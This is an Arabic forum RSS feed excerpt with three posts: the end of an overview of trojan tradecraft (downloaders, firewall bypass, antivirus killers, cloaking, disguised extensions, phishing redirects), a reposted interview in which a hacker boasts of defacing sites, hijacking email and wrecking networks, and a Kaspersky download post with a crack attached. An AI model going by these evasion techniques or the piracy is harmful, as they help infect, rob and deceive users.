لم يقتنع الهاكرز كثيرا بارسال تروجان للضحية <br />
بحجم 200- 400 - 600 - .. ك بايت اذ يتوقع المستخدم<br />
من هذا الحجم برنامج قابل للتنفيذ وليس رسالة خطا تدفعه للشك<br />
كذلك فى حالة ربط التروجان مع احد البرامج الحميدة <br />
فبعد التنفيذ سيختفي التروجان الاصلي ويظل الملف الحميد<br />
melt server after execution<br />
ولذلك يلزم ان يكون فرق الحجم ضئيل جدا بين حجم الملف الحميد<br />
وبين الملف النهائي بحيث لايزيد الفرق عن 3- 4 ك بايت<br />
فى اسوأ الحالات لتفادي شك المستخدم<br />
لذ اعتبر ان الحجم هو احد التحديات<br />
فطور الهاكرز نوعين من البرامح والتقنيات <br />
<br />
<br />
<br />
النوع الاول<br />
برامج يطلق عليها الداون لدورز web downloaders<br />
تقوم بتكوين تروجان لايزيد حجمه عن 1- 4 ك بايت<br />
وهو ماسيرسل للمستخدم وبمجرد تشغيله يقوم بتحميل<br />
التروجان الاصلي ذو الحجم الاكبر والمرفوع مسبقا <br />
الى موقع الهاكرز مباشرة الى جهاز الضحية<br />
بل وتنفيذه دون تدخل الهاكرز وتحقيق الاصابة<br />
<br />
<br />
<br />
النوع الثاني<br />
برامج يطلق عليها uploaders <br />
تلك البرامج ايضا تقوم بتكوين سيرفر صغير الحجم<br />
يتراوح بين 8 - 16 ك و بمجرد ان يقوم المستخدم<br />
بتشغيله يمتلك المخترق بورت مفتوح يمكن من خلاله تحميل<br />
التروجان الكبير، وتكمن خطورة تلك البرامج انها تتحكم فى كافة<br />
العمليات النشطة بنظام التشغيل windows and tasks processes<br />
<br />
<br />
<br />
<br />
<br />
<br />
ثانيا<br />
FWB - FireWall Bypasser<br />
اختراق الجدران النارية<br />
<br />
تعتبر تلك التقنية بحق من اخطر ماتوصل اليه المخترق فباحد<br />
اكواد لغة الديلفي البسيطة يندمج التروجان مع تعريف<br />
الويندوز اكسبلورر وبالتالي يحدث الاتصال بين الهاكرز والتروجان<br />
تحت مسمع ومراي وترحيب الجدران الناري بل<br />
وبدون اي استئذان او صلاحية باعتباره صديق عزيز للمستخدم<br />
تعيب تلك التقنية زيادة حجم التروجان بمقدار 20 ك ولكنها <br />
فى النهاية تقنية تعادل خطورة بالغة <br />
<br />
<br />
<br />
ثالثا<br />
late trojan execution<br />
التنفيذ الموقوت للتروجان<br />
<br />
احد الخدع الحديثة هي برمجة التروجان على التنفيذ فى<br />
توقيت محدد لاحق للتحميل، فعلي سبيل المثال ارسل لك شخص<br />
احد البرامج التى لم يكتشفها الانتي فيروس <br />
وبعد عدة ساعات او ايام او اشهر وحينما تحين ساعة الصفر<br />
يتم التنفيذ late execution<br />
تتميز تلك الطريقة بامكانية برمجة التروجان للتنفيذ فى اوقات يتوقع<br />
عدم عمل الضحية بها لى الانترنت وبالتالي تزيد نسبة اغلاق برنامج<br />
المراقبة بالانتي فيروس monitoring للحصول على كفاءة<br />
اكبر للعمل بجهاز الكمبيوتر<br />
كما يزيل الشك فى الصديق او الشخص او الموقع<br />
الذي كان السبب الاساسي فى الاصابة<br />
<br />
<br />
<br />
رابعا<br />
AV/FW killers<br />
<br />
نظرا لان العديد من المستخدمين يقومون باغلاق خاصية المراقبة<br />
ببرنامج الانتي فيروس اثناء الابحار بالانترنت او خارجه وذلك<br />
لتحسين اداء الجهاز عامة او لان الانتي فيروس يعيق السرعة<br />
ويستهلك الكثير من الذاكرة، فقد استغل المخترق تلك النقطة<br />
وقام بابتكار برامج قاتلة الانتي فيروس والجدران النارية<br />
فعند فتح المستخدم للملف اثناء اغلاق موديول المراقبة<br />
يتم اغلاق كل برامج الحماية قاطبة الى الابد<br />
وبالتالي حتى بعد اعادة التشغيل قد تظهر الايقونة لبرامج الحماية<br />
او لاتظهر، طبقا لتصميم التروجان، ولكنها فى النهاية برامج<br />
حماية مزيفة لاتعمل وبالتاكيد انه لو ترك مويودول المراقبة<br />
بالانتي فيروس فى حالة عمل لتم اصطياد البرنامج كفيروس <br />
وانتهى الامر<br />
<br />
<br />
<br />
<br />
<br />
<br />
خامسا<br />
cloacking<br />
<br />
احد الخصائص الخطيرة فاحد الطرق اليدوية للحماية التى<br />
تعتمد على دراية المستخدم وحرفيته هي مراقبة كل من<br />
task manager<br />
startup<br />
windows processes<br />
registery<br />
<br />
ولكن ماذا تفعل لو اخفى التروجان نفسه عن ابراج المراقبة ؟؟<br />
هذا ماحدث بالفعل من خلال تلك الخاصية المضافة حديثا<br />
<br />
<br />
<br />
<br />
سادسا<br />
scanning using victims ips<br />
<br />
يسعى المخترق بالدرجة الاولى لاخفاء هويته قدر الامكان<br />
عند ارتكاب جرائمه اولا بهدف اخفاء شخصيته عن الضحية<br />
ثانيا بهدف عدم تقفي الاثر من قبل السلطات المختصة حال تعقبه<br />
فاضاف الهاكرز خاصية القيام بعمل مسح للايبيهات<br />
لاصطياد البورتات المفتوحة مستخدما اجهزة الضحايا<br />
فحتى لو قام الجدران الناري بتسليم رقم الاي بي<br />
فسيكون الخاص بضحية مظلوم لايعلم ان جهازه اداة طيعة<br />
فى يد المخترق، بل وحتى لو حاولت السلطات تقفي الاثر<br />
فسيكون الضحية هو الجاني<br />
<br />
<br />
<br />
<br />
<br />
<br />
سابعا<br />
notification trojans<br />
<br />
من المؤكد ان احد الطرق التى تعيق عمل المخترق هي<br />
الحصول على الرقم الفعلي للاي بي للضحية فحتى<br />
لواصاب الضحية ولم يصل له الرقم فسيكون فى غيبوبة<br />
عن اختراقه، ولذلك قامت بمهمة محاولة اعاقة وصول رسائل الابلاغ <br />
للهاكرز مزودات خدمة البريد المجاني ومنها الهوت ميل والياهو<br />
اذ حجبت وصول رسائل العديد من التروجانات الخطيرة<br />
بل وتقوم بصورة دورية بتغيير معرفات سيرفراتها stmp <br />
بهدف حماية المستخدم <br />
ولكن كان للمخترق مخرج اخر فقد ابتعد تماما عن البريد فى الابلاغ<br />
واتجه الى احدث تقنيات تصميم المواقع والمفترض استعمالها<br />
فى التطور التكنولوجي وخير البشرية وعلى سبيل المثال لا الحصر<br />
php<br />
cgi scripting<br />
net send messages<br />
irc bot<br />
icq messenger<br />
msn messenger<br />
regular mail on port 25<br />
<br />
كما استخدم المخترق طريقة اخرى هي برامج متخصصة<br />
تمكن من الحصول على اي بي من هم بقائمة الميسنجر مع المخترق<br />
غير المحظورين وذلك بدون استقبال ملفات من قبل الضحية<br />
مستخدما احد الثغرات العميقة باالام اس ان ميسنجر فى<br />
اصداره السادس <br />
<br />
واخيرا قدمت بعض الشركات الخدمية للبريد تقرير كامل<br />
للهاكرز عن مستقبل الرسالة شاملا الاي بي الحقيقي <br />
وتوقيت فتح الرسالة وتاريخها<br />
وكل ماعلى المخترق هو ارسال رسالة بعنوان شيق للضحية<br />
وبمجرد فتح الرسالة البريدية سيتم وصول الاي بي للهاكرز <br />
وبدون ارسال اي رد من المستخدم او دراية بما يحدث فى الكوليس<br />
وتعتبر الشركات التى تقدم تلك الخدمات، هياكل تجارية كبرى<br />
وليس الهدف منها خدمة المخترقين<br />
ولكن دائما للهاكرز راي اخر فى تطويع التكنولوجيا الحديثة<br />
<br />
<br />
<br />
<br />
<br />
<br />
ثامنا<br />
java scripting<br />
<br />
لا شك ان من اخطر الاكواد التي يمكنها تنفيذ اوامر محددة<br />
بجهاز المستخدم من خلال صفحات الويب هي اكواد الجافا<br />
وقد وصل الامر ان احد اكواد الجافا الشهيرة<br />
كانت السبب الرئيسي فى تطوير ميكروسوفت لاصدارها<br />
من الويندوز ميسنجر من الاصدار 4.7 الى الاصدار الخامس<br />
حيث يقوم كود الجافا بمجرد قيامك بفتحة صفحة الويب تتضمنه<br />
بارسال كافة قائمة الاصدقاء الموجودين بميسنجرك<br />
addresses windows messenger lists<br />
وذلك لبريد الهاكرز خلال ثواني معدودة<br />
ولذلك دائما ماينصح بانه فى حالة عدم احتياج صفحات الويب<br />
لدعم الجافا ان يتم عدم تفعيل تلك الخاصية من خيارات الانترنت<br />
بالمتصفح<br />
<br />
<br />
<br />
تاسعا<br />
redirecting<br />
<br />
فكثيرا مانفتح احد صفحات الويب ونجد عنوان بالصفحة يعني<br />
انه يتم الان تحويلك الى العنوان الجديد للموقع او اي رسالة مشابهة<br />
وهنا كان للهاكرز راي اخر فتصميم صفحة ويب مزيفة شبيهة بصفحة<br />
التسجيل والدخول لحسابك بالبريد لادخال بياناتك ورقمك السري<br />
بها تظهر لك بمجرد طلبك الصفحة الرئيسية للهوت ميل اوالياهو او ..<br />
وبمجرد ادخال بيانات السليمة فسيتم ارسال كلمةالسر<br />
والبيانات الشخصية الى الهاكرز بينما يتم تحويلك<br />
الى الصفحة الحقيقية للبريد للدخول النظامي<br />
وذالك تحت تحت شعار redirecting<br />
<br />
<br />
<br />
<br />
<br />
<br />
عاشرا<br />
extension creator<br />
<br />
مازالت قضية امتداد التروجان احد القضايا التى تشغل بال الهاكرز<br />
فوعي المستخدم كبير والحذر دائم بعدم فتح الملفات<br />
ذات الامتدادات التفيذية واهمها<br />
exe - pif - shs - scr - com - bat<br />
او الاهتمام بضرورة الكشف عليها قبل التشغيل<br />
واخيرا قام الهاكرز بدراسة تصميم برامج تقوم بتوليد اي امتداد تنفيذي <br />
تعتمد تلك البرامج على فكرة ان نظام التشغيل يقوم بتنفيذ<br />
بعضا من الامتدادات ولايقوم بتنفيذ البعض الاخر <br />
بناءا على تعريف نظام التشغيل للريجستري بتلك الهيئات<br />
وعليه فان كل ماسيقوم به البرنامج تعريف الريجستري بجهاز الضحية<br />
باي امتداد مطلوب من قبل الهاكرز <br />
وعليه يمكن ان يحدد الهاكرز ان جهاز الضحية <br />
يمكنه ان يفتح تروجان على الصيغة التالية server.jpeg <br />
ويتم التنفيذ والاصابة بعيدا عن ادنى شك من الضحية</div>

]]></content:encoded>
			<category domain="https://kwety.net/vb/forumdisplay.php?f=61">منتدى الحماية و الهاكرز</category>
			<dc:creator>آسيل5</dc:creator>
			<guid isPermaLink="true">https://kwety.net/vb/showthread.php?t=32528</guid>
		</item>
		<item>
			<title>مقابلة مع اكبر هكر سعودي اوقف الياهو....</title>
			<link>https://kwety.net/vb/showthread.php?t=32463&amp;goto=newpost</link>
			<pubDate>Sun, 12 Nov 2006 10:46:59 GMT</pubDate>
			<description><![CDATA[[FRAME="7 10"]
سعودي عمره 25عاما كان من ضمن المجموعة التي اخترقت موقع الياهو يقول انه لايخشى الملاحقة القانونية وقد حاورته احدى المجلات وكان هذا اللقاء ...........

س : كيف ترى عالم الهاكر في العالم العربي ؟

ج : للاسف الهاكر في نظر الشباب العربي عبارة عن الدخول على اجهزة الغير وتدمير ما يمكن ان يصلوا اليه فقط مع ان هذا الجزء التافه جدا في عالم الهاكر ولا توجد فائدة من ورائه واتمنى ان ينظروا الى ابعد من ذلك ان اختراق أنظمة حماية الشبكات الكبرى بالاضافة الى المواقع هو الجزء الصعب في عالم الهاكر وليس اختراق جهاز شخصي والذي عادة ما يكون مهيا لذلك وجاهزا للاختراق تماما ونادرا ولكن عند اختراقك لشبكة معينه كائنه من تكون هنالك فائدة من تدمير ملفاتها وايقافها لفترة فان القائمين وراءه سوف يطلبونك بأي ثمن لكي تمنع المزيد عنهم من الهاكر ولا يخفى علينا الجزء الأكثر أهمية وهو ( أختراق البريد ) فتخيل بريدك الشخصي بمقدور أحد الاطلاع على الرسائل الواردة اليه وأحيانا لاتستطيع الدخول اليه الى الابد لانتقال ملكيته من دون سابق انذار لشخص آخر .

س : أين تعلمت الهاكرز ؟ وكيف ؟

ج : قبل سفري للدراسة بالخارج لم اكن أعلم ما هي الأنترنت وأقصى ما توصلت اليه هو حل شيفرات بعض البرامج فقط . ولكن الحظ هو الذي قادني الى السكن مع شخص امريكي يعتبر الأول من دون منافس بين شباب الجامعة في ذلك الوقت وكان مشهورا بأسم ( SPYMAN ) وهو الذي تعلمت منه بدايات الهاكينج وكانت الحماية في تلك السنوات تافهة جدا على صعيد الشبكات المحلية او الأنترنت عموما ، وكان من الصعب تتبع الجاني فكانت الاختراقات التي تتم من قبلنا لا تعد ولاتحصى ، وبعد عودتي بدأت أطور نفسي أكثر فأكثر .

س : ما هي القصص الطريفة التي حدثت لك ؟

ج : داخليا اختراق شبكة أحد أقاربي من دون أن اعلم أنها له كانت مقدمة الّي على طبق من ذهب ، ولم أضيع وقتي في التعرف على هويتها . وفي اليوم التالي أخبرني بدخول أحدهم الى سيرفرات شركته وتركه لرسالة يخبره فيها بوجود ثغرات كبيرة فيها ، وطلب مني مساعدته على حلها وطبعا حللت له المشكلة من دون توضيح هوية المخترق الى اليوم . أما خارجيا فدخولي تحدي أنا وهاكرز برازيليان ضد مجموعة ، وفي منتصف المعركة اكتشفنا انهم بقيادة ( SPYMAN ) الذي وضعني على اول الطريق ، فقمت بتسريب معلومات له عن البرازيليين - من دون علمهم - والى الآن لا يعلمون كيف خسروا المعركة .

س : يلقبونك بزعيم الهاكرز العرب فما هو رأيك ؟؟

ج : عربيا نعم ، أقولها وبكل أسف لتوجه الشباب العرب الى أقل مستويات الهاكر .

س : هل هناك ايجابيات من الأختراقات التي تقوم بها ؟

ج : طبعا فعند تمكني من أختراق شبكة معينة أترك رسالة توضح الثغرة الموجودة لديهم وكيفية اصلاحها لتفادي أختراقها من قبل آخرين . ناهيك عن المواقع الكثيرة التي تمس الدين الأسلامي أو الحياء العربي والتي أكرس أغلب وقتي لأختراقها وأغلاقها نهائيا .

س : هل طلب أحد مساعدتك ؟

ج : عدد لايعد ولا يحصى على المستوى العربي والعالمي منهم من تكون نيته طيبة مثل الذي نسي الباسوورد الخاص ببريدة الألكتروني أو سرق منه ويود أستعادته ، هؤلاء أساعدهم بصدر رحب . ومنهم من تكون نيته سيئة بقصد التجسس على أسرار الآخرين وهؤلاء لا أعيرهم أهتماما . والبعض عرض علّي مبالغ سخية جدا لتنفيذ رغباته .

س : هل لك أن تشرح لنا كيف عرضت عليك هذة المبالغ ؟

ج : أغلب المبالغ التي عرضت علّي كانت من أجل التجسس على الغير وكانت المحاولات بداية عن طريق الاقناع فقط ، ثم تقدم العروض عند وصولهم الى حالة اليأس وكانت أسبابهم مختلفة فمنهم من يدعي نسيان كلمة المرور وأن البريد يخصه هو ، ومنهم من يقول بأن البريد يخص زوجته أو خطيبته أو أخته ويريد الأطمئنان على أمر ما في نفسه ، وأسباب أخرى غريبة وعجيبة . ولكن أغرب عرض قدم الّي هو طلب أحدهم معرفة اذا ما كانت رسالته التي أرسلها على بريد معين قد قرأت أم لا من قبل صاحب البريد ووصل العرض الى سبعين الف ريال من أجل هذة المعلومة فقط . ولكن من سوء حظهم انني مرتاح ماديا الى اقصى حد ، وفي الوقت نفسه على أستعداد تام لمساعدة من يستحق المساعدة الفعلية .

س : هل تستطيع الوصول لملفات أي شخص يعمل على الأنترنت ؟

ج : بكل سهولة مهما كان مستوى الحماية لديه عاليا ، ولكنني لا أقوم بمثل هذة الأعمال الأ اذا كانت مسألة تحد بيني وبين الشخص نفسه .

س : ماهي العمليات التي تستطيع القيام بها ؟

ج : * أختراق المواقع المجانية وتغيير الصفحة الرئيسية بها الى الأبد، وكذلك المواقع ذات النطاق الخاص ومسح جميع ملفاتها بحيث يصعب أعادتها في وقت قصير .
* أختراق البريد الألكتروني سواء المجاني أو المقدم من مزودي الخدمة المحلي وتغيير الرقم السري والأحتفاظ به لنفسي .
* الأطلاع على أي جهاز متصل بالأنترنت شخصيا أو سيرفر لشركة .
* قطع أتصال أي شخص أو الدخول على الأنترنت المحلية مجانا من غير أشتراك .
* تجميد بعض المواقع المشهورة على الأنترنت يستحيل أختراقها لدقائق معدودة بحيث لا يمكن تصفحها من قبل الزائرين في تلك الفترات المحدودة .

س : كم ساعة تقضي باليوم على الحاسب الالي ؟

ج : من خمس الى تسع ساعات يوميا .

س : هل تستطيع عمل الكراك وأنت تقوم بفك شفرة أي برنامج له رقم تسلسلي ؟

ج : بكل سهولة حتى أن شركة عربية لتصميم البرامج أستعانت بقدراتي لعمل حماية على برامجها والتي يصعب حل شيفرتها الآن حيث أصبحت مثل الصخر الصعب الكسر .

س : هل لنا أن نعرف من هي تلك الشركة ؟

ج : للأسف لا أستطيع ذكر أسم هذة الشركة صراحة لأحترامي الشديد وصداقتي للمسؤول عن الحماية لديها .

س : هل هناك نصيحة لأصحاب المواقع لكي يتفادوا الهجوم على مواقعهم ؟

ج : * عدم حفظ الباسوورد الخاص بمواقعهم في الويندوز عندما يسألهم المتصفح ذلك .
* عدم الأعتماد على الويندوز 95 لوجود ثغرة كبيرة يمكن الدخول من خلالها والتي تم تفاديها في الأصدارات التي تلتها من دون أعتراف الميكروسفت بذلك .
* الطلب من الشركة التي تستضيف موقعهم بعدم السماح للسيرفر بتقبل الملفات من نوع exe .
* عدم أستعمال برامج ftp لتحميل ملفاتهم الى السيرفر المستضيف لموقعهم لسهولة الحصول على الملف الخاص بالباسوورد وأسم المستخدم من ملفات البرنامج نفسه عند أختراق أجهزتهم .
* عدم أستعمال البرامج التي تدعي الحماية أنها تحمي من الهاكر المبتدئين لكنها تسهل على المتقدمين بسبب تحكمها الكبير على أنظمة الدخول الى السيرفر .

س : ماهي أشهر الأعمال التي قمت بها ؟؟

ج : * اختراق 31 موقعا مجانيا وأمتلاكها .
* اختراق 18 شبكة محلية والأطلاع على جميع ملفاتها من دون المساس بها .
* اختراق 54 موقعا ذات نطاق خاص وتغيير الصفحة الرئيسية لها .
* أنشاء رسالة مجهولة بمجرد فتحها ترسل جميع الرسائل بصندوق البريد الى صندوقي الخاص .
* تجميد أشهر موقع على الأنترنت YAHOO لمدة سبع دقائق لم يتمكن أحد من تصفح الموقع خلالها وذلك بالتعاون مع( SPY MAN THEBOMBER WOLF + FATALS + ARAB HAKCKER) بتاريخ 18 -3 -1999 الساعة 15 2 .
* اختراق شبكة باراجون البرازيلية وتدمير جميع ملفاتها الرئيسية مع THE JACKAL + FATALS .

س : ماذا تخطط لمستقبلك وهل تخشى من أن تتهم أمنيا وعلى نطاق عالمي ؟؟

ج : ما يشغل تفكيري سؤال أسأله لنفسي دوما : هل سأستطيع التعامل مع تقنيات المستقبل الأمنية والتي في تطور داءم ، أما بالنسبة لاتهامي فلا اعتقد ذلك لسبب بسيط وهو عدم وجود مستمسك ضدي .

* انتهى الحوار *

*** ملاحظة ...... الحوار منقول.
 [/FRAME]]]></description>
			<content:encoded><![CDATA[<div>[FRAME=&quot;7 10&quot;]<br />
سعودي عمره 25عاما كان من ضمن المجموعة التي اخترقت موقع الياهو يقول انه لايخشى الملاحقة القانونية وقد حاورته احدى المجلات وكان هذا اللقاء ...........<br />
<br />
س : كيف ترى عالم الهاكر في العالم العربي ؟<br />
<br />
ج : للاسف الهاكر في نظر الشباب العربي عبارة عن الدخول على اجهزة الغير وتدمير ما يمكن ان يصلوا اليه فقط مع ان هذا الجزء التافه جدا في عالم الهاكر ولا توجد فائدة من ورائه واتمنى ان ينظروا الى ابعد من ذلك ان اختراق أنظمة حماية الشبكات الكبرى بالاضافة الى المواقع هو الجزء الصعب في عالم الهاكر وليس اختراق جهاز شخصي والذي عادة ما يكون مهيا لذلك وجاهزا للاختراق تماما ونادرا ولكن عند اختراقك لشبكة معينه كائنه من تكون هنالك فائدة من تدمير ملفاتها وايقافها لفترة فان القائمين وراءه سوف يطلبونك بأي ثمن لكي تمنع المزيد عنهم من الهاكر ولا يخفى علينا الجزء الأكثر أهمية وهو ( أختراق البريد ) فتخيل بريدك الشخصي بمقدور أحد الاطلاع على الرسائل الواردة اليه وأحيانا لاتستطيع الدخول اليه الى الابد لانتقال ملكيته من دون سابق انذار لشخص آخر .<br />
<br />
س : أين تعلمت الهاكرز ؟ وكيف ؟<br />
<br />
ج : قبل سفري للدراسة بالخارج لم اكن أعلم ما هي الأنترنت وأقصى ما توصلت اليه هو حل شيفرات بعض البرامج فقط . ولكن الحظ هو الذي قادني الى السكن مع شخص امريكي يعتبر الأول من دون منافس بين شباب الجامعة في ذلك الوقت وكان مشهورا بأسم ( SPYMAN ) وهو الذي تعلمت منه بدايات الهاكينج وكانت الحماية في تلك السنوات تافهة جدا على صعيد الشبكات المحلية او الأنترنت عموما ، وكان من الصعب تتبع الجاني فكانت الاختراقات التي تتم من قبلنا لا تعد ولاتحصى ، وبعد عودتي بدأت أطور نفسي أكثر فأكثر .<br />
<br />
س : ما هي القصص الطريفة التي حدثت لك ؟<br />
<br />
ج : داخليا اختراق شبكة أحد أقاربي من دون أن اعلم أنها له كانت مقدمة الّي على طبق من ذهب ، ولم أضيع وقتي في التعرف على هويتها . وفي اليوم التالي أخبرني بدخول أحدهم الى سيرفرات شركته وتركه لرسالة يخبره فيها بوجود ثغرات كبيرة فيها ، وطلب مني مساعدته على حلها وطبعا حللت له المشكلة من دون توضيح هوية المخترق الى اليوم . أما خارجيا فدخولي تحدي أنا وهاكرز برازيليان ضد مجموعة ، وفي منتصف المعركة اكتشفنا انهم بقيادة ( SPYMAN ) الذي وضعني على اول الطريق ، فقمت بتسريب معلومات له عن البرازيليين - من دون علمهم - والى الآن لا يعلمون كيف خسروا المعركة .<br />
<br />
س : يلقبونك بزعيم الهاكرز العرب فما هو رأيك ؟؟<br />
<br />
ج : عربيا نعم ، أقولها وبكل أسف لتوجه الشباب العرب الى أقل مستويات الهاكر .<br />
<br />
س : هل هناك ايجابيات من الأختراقات التي تقوم بها ؟<br />
<br />
ج : طبعا فعند تمكني من أختراق شبكة معينة أترك رسالة توضح الثغرة الموجودة لديهم وكيفية اصلاحها لتفادي أختراقها من قبل آخرين . ناهيك عن المواقع الكثيرة التي تمس الدين الأسلامي أو الحياء العربي والتي أكرس أغلب وقتي لأختراقها وأغلاقها نهائيا .<br />
<br />
س : هل طلب أحد مساعدتك ؟<br />
<br />
ج : عدد لايعد ولا يحصى على المستوى العربي والعالمي منهم من تكون نيته طيبة مثل الذي نسي الباسوورد الخاص ببريدة الألكتروني أو سرق منه ويود أستعادته ، هؤلاء أساعدهم بصدر رحب . ومنهم من تكون نيته سيئة بقصد التجسس على أسرار الآخرين وهؤلاء لا أعيرهم أهتماما . والبعض عرض علّي مبالغ سخية جدا لتنفيذ رغباته .<br />
<br />
س : هل لك أن تشرح لنا كيف عرضت عليك هذة المبالغ ؟<br />
<br />
ج : أغلب المبالغ التي عرضت علّي كانت من أجل التجسس على الغير وكانت المحاولات بداية عن طريق الاقناع فقط ، ثم تقدم العروض عند وصولهم الى حالة اليأس وكانت أسبابهم مختلفة فمنهم من يدعي نسيان كلمة المرور وأن البريد يخصه هو ، ومنهم من يقول بأن البريد يخص زوجته أو خطيبته أو أخته ويريد الأطمئنان على أمر ما في نفسه ، وأسباب أخرى غريبة وعجيبة . ولكن أغرب عرض قدم الّي هو طلب أحدهم معرفة اذا ما كانت رسالته التي أرسلها على بريد معين قد قرأت أم لا من قبل صاحب البريد ووصل العرض الى سبعين الف ريال من أجل هذة المعلومة فقط . ولكن من سوء حظهم انني مرتاح ماديا الى اقصى حد ، وفي الوقت نفسه على أستعداد تام لمساعدة من يستحق المساعدة الفعلية .<br />
<br />
س : هل تستطيع الوصول لملفات أي شخص يعمل على الأنترنت ؟<br />
<br />
ج : بكل سهولة مهما كان مستوى الحماية لديه عاليا ، ولكنني لا أقوم بمثل هذة الأعمال الأ اذا كانت مسألة تحد بيني وبين الشخص نفسه .<br />
<br />
س : ماهي العمليات التي تستطيع القيام بها ؟<br />
<br />
ج : * أختراق المواقع المجانية وتغيير الصفحة الرئيسية بها الى الأبد، وكذلك المواقع ذات النطاق الخاص ومسح جميع ملفاتها بحيث يصعب أعادتها في وقت قصير .<br />
* أختراق البريد الألكتروني سواء المجاني أو المقدم من مزودي الخدمة المحلي وتغيير الرقم السري والأحتفاظ به لنفسي .<br />
* الأطلاع على أي جهاز متصل بالأنترنت شخصيا أو سيرفر لشركة .<br />
* قطع أتصال أي شخص أو الدخول على الأنترنت المحلية مجانا من غير أشتراك .<br />
* تجميد بعض المواقع المشهورة على الأنترنت يستحيل أختراقها لدقائق معدودة بحيث لا يمكن تصفحها من قبل الزائرين في تلك الفترات المحدودة .<br />
<br />
س : كم ساعة تقضي باليوم على الحاسب الالي ؟<br />
<br />
ج : من خمس الى تسع ساعات يوميا .<br />
<br />
س : هل تستطيع عمل الكراك وأنت تقوم بفك شفرة أي برنامج له رقم تسلسلي ؟<br />
<br />
ج : بكل سهولة حتى أن شركة عربية لتصميم البرامج أستعانت بقدراتي لعمل حماية على برامجها والتي يصعب حل شيفرتها الآن حيث أصبحت مثل الصخر الصعب الكسر .<br />
<br />
س : هل لنا أن نعرف من هي تلك الشركة ؟<br />
<br />
ج : للأسف لا أستطيع ذكر أسم هذة الشركة صراحة لأحترامي الشديد وصداقتي للمسؤول عن الحماية لديها .<br />
<br />
س : هل هناك نصيحة لأصحاب المواقع لكي يتفادوا الهجوم على مواقعهم ؟<br />
<br />
ج : * عدم حفظ الباسوورد الخاص بمواقعهم في الويندوز عندما يسألهم المتصفح ذلك .<br />
* عدم الأعتماد على الويندوز 95 لوجود ثغرة كبيرة يمكن الدخول من خلالها والتي تم تفاديها في الأصدارات التي تلتها من دون أعتراف الميكروسفت بذلك .<br />
* الطلب من الشركة التي تستضيف موقعهم بعدم السماح للسيرفر بتقبل الملفات من نوع exe .<br />
* عدم أستعمال برامج ftp لتحميل ملفاتهم الى السيرفر المستضيف لموقعهم لسهولة الحصول على الملف الخاص بالباسوورد وأسم المستخدم من ملفات البرنامج نفسه عند أختراق أجهزتهم .<br />
* عدم أستعمال البرامج التي تدعي الحماية أنها تحمي من الهاكر المبتدئين لكنها تسهل على المتقدمين بسبب تحكمها الكبير على أنظمة الدخول الى السيرفر .<br />
<br />
س : ماهي أشهر الأعمال التي قمت بها ؟؟<br />
<br />
ج : * اختراق 31 موقعا مجانيا وأمتلاكها .<br />
* اختراق 18 شبكة محلية والأطلاع على جميع ملفاتها من دون المساس بها .<br />
* اختراق 54 موقعا ذات نطاق خاص وتغيير الصفحة الرئيسية لها .<br />
* أنشاء رسالة مجهولة بمجرد فتحها ترسل جميع الرسائل بصندوق البريد الى صندوقي الخاص .<br />
* تجميد أشهر موقع على الأنترنت YAHOO لمدة سبع دقائق لم يتمكن أحد من تصفح الموقع خلالها وذلك بالتعاون مع( SPY MAN THEBOMBER WOLF + FATALS + ARAB HAKCKER) بتاريخ 18 -3 -1999 الساعة 15 2 .<br />
* اختراق شبكة باراجون البرازيلية وتدمير جميع ملفاتها الرئيسية مع THE JACKAL + FATALS .<br />
<br />
س : ماذا تخطط لمستقبلك وهل تخشى من أن تتهم أمنيا وعلى نطاق عالمي ؟؟<br />
<br />
ج : ما يشغل تفكيري سؤال أسأله لنفسي دوما : هل سأستطيع التعامل مع تقنيات المستقبل الأمنية والتي في تطور داءم ، أما بالنسبة لاتهامي فلا اعتقد ذلك لسبب بسيط وهو عدم وجود مستمسك ضدي .<br />
<br />
* انتهى الحوار *<br />
<br />
*** ملاحظة ...... الحوار منقول.<br />
 [/FRAME]</div>

]]></content:encoded>
			<category domain="https://kwety.net/vb/forumdisplay.php?f=61">منتدى الحماية و الهاكرز</category>
			<dc:creator>آسيل5</dc:creator>
			<guid isPermaLink="true">https://kwety.net/vb/showthread.php?t=32463</guid>
		</item>
		<item>
			<title>احدث اصدار لعملاق الحماية الروسي الكاسبر .. Kaspersky Anti-Virus 6.0.0.303</title>
			<link>https://kwety.net/vb/showthread.php?t=32169&amp;goto=newpost</link>
			<pubDate>Thu, 26 Oct 2006 22:35:45 GMT</pubDate>
			<description>السلام عليكم ورحمة الله وبركاته


Kaspersky Anti-Virus 6.0.0.303



صورة: http://www.kwety.net/kwety1/q810/fdf78c0a1.jpg 


صورة: http://www.kwety.net/kwety1/q810/e3bd3403aa2.jpg 


أقدم لكم آخر إصدار من برنامج الحماية الكاسبر النسخة الإحترافية

فهذا البرنامج هو أخر نسخة من العملاق الشهير والأفضل

في مجال الحماية الكاملة من الفيروسات وتم حل

مشكلة التحديث والبريد الاكتروني في هذه النسخة .

حجم البرنامج : 12.7 ميجا بايت 

لتحميل البرنامج :


اضغط هنا (http://d-us-1h.kaspersky-labs.com/products/release/english/homeuser/kav6.0/kav6.0.0.303en.msi)


الكراك بالمرفقات</description>
			<content:encoded><![CDATA[<div><font color="DarkGreen">السلام عليكم ورحمة الله وبركاته</font><br />
<br />
<br />
<font size="3"><font color="Red">Kaspersky Anti-Virus 6.0.0.303</font></font><br />
<br />
<br />
<br />
<img src="http://www.kwety.net/kwety1/q810/fdf78c0a1.jpg" border="0" alt="" /><br />
<br />
<br />
<img src="http://www.kwety.net/kwety1/q810/e3bd3403aa2.jpg" border="0" alt="" /><br />
<br />
<br />
<font size="2"><font color="Navy">أقدم لكم آخر إصدار من برنامج الحماية الكاسبر النسخة الإحترافية<br />
<br />
فهذا البرنامج هو أخر نسخة من العملاق الشهير والأفضل<br />
<br />
في مجال الحماية الكاملة من الفيروسات وتم حل<br />
<br />
مشكلة التحديث والبريد الاكتروني في هذه النسخة .<br />
<br />
حجم البرنامج : 12.7 ميجا بايت <br />
<br />
لتحميل البرنامج :</font></font><br />
<br />
<br />
<font size="3"><a href="http://d-us-1h.kaspersky-labs.com/products/release/english/homeuser/kav6.0/kav6.0.0.303en.msi" target="_blank">اضغط هنا</a></font><br />
<br />
<br />
<font size="2"><font color="DarkGreen">الكراك بالمرفقات</font></font></div>


	<br />
	<div style="padding:6px">

	

	

	

	
		<fieldset class="fieldset">
			<legend>الملفات المرفقة</legend>
			<table cellpadding="0" cellspacing="3" border="0">
			<tr><td dir="rtl">
	<table border="0" cellpadding="0" width="100%" bordercolor="#444" id="table2" dir="rtl">
		<tr>
